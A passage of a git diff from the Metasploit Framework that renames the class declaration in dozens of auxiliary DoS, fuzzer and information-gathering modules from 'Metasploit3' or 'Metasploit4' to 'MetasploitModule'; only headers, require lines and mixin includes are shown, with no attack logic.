b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb index de18f018d1..1729724e16 100644 --- a/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb +++ b/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index 81f16d4860..6f15b331b3 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/windows/tftp/solarwinds.rb b/modules/auxiliary/dos/windows/tftp/solarwinds.rb index 7be42e23eb..9c11bf9139 100644 --- a/modules/auxiliary/dos/windows/tftp/solarwinds.rb +++ b/modules/auxiliary/dos/windows/tftp/solarwinds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index 9eeb6b614a..a04ee8e064 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/chunked.rb b/modules/auxiliary/dos/wireshark/chunked.rb index fa78ad8a42..3cb3a0a4a3 100644 --- a/modules/auxiliary/dos/wireshark/chunked.rb +++ b/modules/auxiliary/dos/wireshark/chunked.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/cldap.rb b/modules/auxiliary/dos/wireshark/cldap.rb index 63c678cc06..edbef44b07 100644 --- a/modules/auxiliary/dos/wireshark/cldap.rb +++ b/modules/auxiliary/dos/wireshark/cldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index ee3f9bd317..f56c69f873 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Dos diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb index 2d81a8f2c6..134bb40878 100644 --- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb +++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'bit-struct' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index f28388b2f2..d351b927a6 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Exploit::Remote::TcpServer diff --git a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb index 00cf7bcdf5..6901b150b8 100644 --- a/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb +++ b/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/fuzzers/http/http_form_field.rb b/modules/auxiliary/fuzzers/http/http_form_field.rb index b115f6dd62..feca22a35c 100644 --- a/modules/auxiliary/fuzzers/http/http_form_field.rb +++ b/modules/auxiliary/fuzzers/http/http_form_field.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 7dfe8a5d26..9aa76fb03e 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index 7f186ec68a..ef23f1f7e5 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 922de4aa88..3d7168f45e 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntp' require 'securerandom' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Fuzzer include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index a6b195bf44..d9ab59f73c 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb index 5d4486fc5e..2cca415efe 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb index 17ae41ffde..a7779eb25f 100644 --- a/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index a47564f63f..43f2f3d00c 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb index 22b0824f1f..fbd70d10d0 100644 --- a/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb index a8eec1e014..78fabd2f8d 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb index de640033a7..e8e1e0a081 100644 --- a/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SMB::Client include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb index 607d774e18..4f8e978363 100644 --- a/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb +++ b/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Smtp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb index 23d1f9cb56..6f14b476c8 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb index fb5cad0492..ab17f04b9b 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb index fbb1368b86..c08d8075ee 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb index 658ecdee4a..3f3c58f872 100644 --- a/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb +++ b/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb index 9074760d1c..c65762796b 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/fuzzers/tds/tds_login_username.rb b/modules/auxiliary/fuzzers/tds/tds_login_username.rb index 611c33d0ca..0f8d5520de 100644 --- a/modules/auxiliary/fuzzers/tds/tds_login_username.rb +++ b/modules/auxiliary/fuzzers/tds/tds_login_username.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Fuzzer diff --git a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb index 8838dd445e..06aa0639ed 100644 --- a/modules/auxiliary/gather/alienvault_iso27001_sqli.rb +++ b/modules/auxiliary/gather/alienvault_iso27001_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb index 3eeeb94f06..3fc5e20342 100644 --- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb +++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/android_browser_file_theft.rb b/modules/auxiliary/gather/android_browser_file_theft.rb index f0b00f0fe1..aca3bdc41b 100644 --- a/modules/auxiliary/gather/android_browser_file_theft.rb +++ b/modules/auxiliary/gather/android_browser_file_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb index f87821d32b..266575bff8 100644 --- a/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb +++ b/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/jsobfu' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_htmlfileprovider.rb b/modules/auxiliary/gather/android_htmlfileprovider.rb index c8edc3c0ed..339a2f01b6 100644 --- a/modules/auxiliary/gather/android_htmlfileprovider.rb +++ b/modules/auxiliary/gather/android_htmlfileprovider.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb index bebf1f081f..3c3bce84f1 100644 --- a/modules/auxiliary/gather/android_object_tag_webview_uxss.rb +++ b/modules/auxiliary/gather/android_object_tag_webview_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::JSObfu diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 887dcea57d..4296dbb238 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb +++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_karaf_command_execution.rb b/modules/auxiliary/gather/apache_karaf_command_execution.rb index 17a4f0336b..0aaf08e0bd 100644 --- a/modules/auxiliary/gather/apache_karaf_command_execution.rb +++ b/modules/auxiliary/gather/apache_karaf_command_execution.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apache_rave_creds.rb b/modules/auxiliary/gather/apache_rave_creds.rb index eb9574bbff..320bc12a25 100644 --- a/modules/auxiliary/gather/apache_rave_creds.rb +++ b/modules/auxiliary/gather/apache_rave_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb index af2359c05b..9619e2229f 100644 --- a/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb +++ b/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::FtpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb index 98d347f89d..05dd9a693a 100644 --- a/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb +++ b/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/exploit/format/webarchive' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/avtech744_dvr_accounts.rb b/modules/auxiliary/gather/avtech744_dvr_accounts.rb index 4c37acb610..632127d02d 100644 --- a/modules/auxiliary/gather/avtech744_dvr_accounts.rb +++ b/modules/auxiliary/gather/avtech744_dvr_accounts.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/checkpoint_hostname.rb b/modules/auxiliary/gather/checkpoint_hostname.rb index b185233021..84d4cf9800 100644 --- a/modules/auxiliary/gather/checkpoint_hostname.rb +++ b/modules/auxiliary/gather/checkpoint_hostname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/chromecast_wifi.rb b/modules/auxiliary/gather/chromecast_wifi.rb index 5b0c218f6d..9cb0676df5 100644 --- a/modules/auxiliary/gather/chromecast_wifi.rb +++ b/modules/auxiliary/gather/chromecast_wifi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/citrix_published_applications.rb b/modules/auxiliary/gather/citrix_published_applications.rb index ade049c58b..8754bd5bab 100644 --- a/modules/auxiliary/gather/citrix_published_applications.rb +++ b/modules/auxiliary/gather/citrix_published_applications.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/citrix_published_bruteforce.rb b/modules/auxiliary/gather/citrix_published_bruteforce.rb index 8160691034..b04997750e 100644 --- a/modules/auxiliary/gather/citrix_published_bruteforce.rb +++ b/modules/auxiliary/gather/citrix_published_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/coldfusion_pwd_props.rb b/modules/auxiliary/gather/coldfusion_pwd_props.rb index bfaf631e24..ba70df4668 100644 --- a/modules/auxiliary/gather/coldfusion_pwd_props.rb +++ b/modules/auxiliary/gather/coldfusion_pwd_props.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_id.rb b/modules/auxiliary/gather/corpwatch_lookup_id.rb index e6ca939df3..30cf6a6c26 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_id.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_id.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index cf83fbecc9..6ca6ae70c6 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/d20pass.rb b/modules/auxiliary/gather/d20pass.rb index de42cb7159..cb1313bec2 100644 --- a/modules/auxiliary/gather/d20pass.rb +++ b/modules/auxiliary/gather/d20pass.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/ui/text/shell' require 'rex/proto/tftp' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Rex::Ui::Text include Rex::Proto::TFTP include Msf::Exploit::Remote::Udp diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index c87615aa62..d501492d94 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_cache_scraper.rb b/modules/auxiliary/gather/dns_cache_scraper.rb index 3b4794fa3f..b32849874c 100644 --- a/modules/auxiliary/gather/dns_cache_scraper.rb +++ b/modules/auxiliary/gather/dns_cache_scraper.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/dns/resolver' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index 0834c5c16e..2a1d0aebd0 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index 4726b53de9..cb960ba1d8 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/dns_srv_enum.rb b/modules/auxiliary/gather/dns_srv_enum.rb index 31866fb56a..0bf36e086f 100644 --- a/modules/auxiliary/gather/dns_srv_enum.rb +++ b/modules/auxiliary/gather/dns_srv_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' require "net/dns/resolver" require 'rex' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/doliwamp_traversal_creds.rb b/modules/auxiliary/gather/doliwamp_traversal_creds.rb index 0967baf944..93c6c5367b 100644 --- a/modules/auxiliary/gather/doliwamp_traversal_creds.rb +++ b/modules/auxiliary/gather/doliwamp_traversal_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/drupal_openid_xxe.rb b/modules/auxiliary/gather/drupal_openid_xxe.rb index 6110eb4ed8..ce5a7e2a87 100644 --- a/modules/auxiliary/gather/drupal_openid_xxe.rb +++ b/modules/auxiliary/gather/drupal_openid_xxe.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index 0fe0e0039c..0cd76869b6 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb index 6310586fc2..9b0736f29e 100644 --- a/modules/auxiliary/gather/emc_cta_xxe.rb +++ b/modules/auxiliary/gather/emc_cta_xxe.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index 7c19308176..51add4368f 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb @@ -6,7 +6,7 @@ require 'msf/core' require "net/dns/resolver" -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report def initialize(info = {}) diff --git a/modules/auxiliary/gather/eventlog_cred_disclosure.rb b/modules/auxiliary/gather/eventlog_cred_disclosure.rb index 6d58c3b95b..3e62e3adac 100644 --- a/modules/auxiliary/gather/eventlog_cred_disclosure.rb +++ b/modules/auxiliary/gather/eventlog_cred_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/gather/external_ip.rb b/modules/auxiliary/gather/external_ip.rb index 5eb3919f80..50ca2d8c1b 100644 --- a/modules/auxiliary/gather/external_ip.rb +++ b/modules/auxiliary/gather/external_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index e7b7b72f02..0f1fe2fdd8 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git 